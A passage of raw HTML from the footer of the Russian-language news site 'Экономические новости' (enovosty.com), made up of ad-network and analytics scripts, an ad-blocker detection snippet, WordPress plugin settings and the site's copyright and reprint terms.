head.appendChild(script);</script></div><br><div id="help" style="margin-bottom: 15px;"><a href="https://ubb.org.ua/uk/project/5571/" target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/Dopomoga1.jpg" alt="help"></a></div><br><div id="IKtqTHiNyi54Vv6DSxwj" data-type="2" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'idhvbfj.pro';</script><script src="//idhvbfj.pro/BML.js" ></script><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-290"></div><script type="text/javascript">new MTr('300-290', {site:907,format:0});</script><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a> <div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4783776"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript'>
var pollsL10n = {"ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","text_wait":"\u0412\u0430\u0448 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435\u2026","text_valid":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0432\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.","text_multiple":"\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0451\u043d\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u044b\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432:","show_loading":"1","show_fading":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wp-polls/polls.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4783776","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "ad2daacc00";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div id='admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'></div><script>admixerML.fn.push(function () { admixerML.display('admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069'); });</script><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script src="https://affiliate.ria.com/js/ria_informer.js?riacode=015d2e7c4ce2cda608aa710275088255" async></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> </body></html>